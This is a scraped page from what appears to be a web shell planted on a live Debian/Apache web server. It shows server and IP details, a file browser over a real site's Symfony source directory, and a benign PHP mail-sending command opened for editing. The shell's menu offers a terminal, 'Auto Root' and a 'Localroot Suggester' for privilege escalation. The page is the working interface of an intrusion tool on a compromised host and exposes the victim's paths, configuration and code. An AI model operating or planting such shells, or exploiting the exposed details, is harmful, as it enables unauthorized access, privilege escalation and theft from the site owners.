Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
src /
ContactBundle /
Command /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
MailChimpBatchSyncCommand.php
1.83
KB
-rwxrwxr-x
2026-04-02 11:48
MailChimpForgetCommand.php
1.42
KB
-rwxrwxr-x
2026-04-02 11:48
MailChimpRenameDomainCommand.php
1.44
KB
-rwxrwxr-x
2026-04-02 11:48
MessageCommand.php
1.51
KB
-rwxrwxr-x
2026-04-02 12:06
SendNotificationsCommand.php
1.54
KB
-rwxrwxr-x
2026-04-02 12:06
php_errors.log
670
B
-rwxrwxr-x
2026-04-02 12:06
Save
Rename
<?php namespace App\ContactBundle\Command; use Symfony\Component\Console\Command\Command; use Symfony\Component\Console\Input\InputInterface; use Symfony\Component\Console\Output\OutputInterface; use Symfony\Component\Mailer\MailerInterface; use App\CoreBundle\Services\ServiceGetterManager; /** * Message Command * * @author Otto Saayman <otto@igotafrica.com> * @package ContactBundle * @subpackage Controller * @version 0.0.1 */ class MessageCommand extends Command { private $serviceGetterManager; /** * Mailer Interface * @var object */ private $mailer = null; public function __construct(ServiceGetterManager $serviceGetterManager, MailerInterface $mailer) { $this->serviceGetterManager = $serviceGetterManager; $this->mailer = $mailer; parent::__construct(); } protected function configure() { $this ->setName('iga:message:send') ->setDescription('Send e-mails in the database') ; } protected function execute(InputInterface $input, OutputInterface $output) { if (!$this->serviceGetterManager->get('batch_job.manager')->canProcessAny($output, 'message:send')) { return; } $_SERVER["HTTP_HOST"] = 'igotafrica.com'; $messageManager = $this->serviceGetterManager->get('contact_message.manager'); $mailCount = $messageManager->sendMails($this->mailer); $output->writeln('Sent ' . $mailCount . ' mails'); return Command::SUCCESS; } }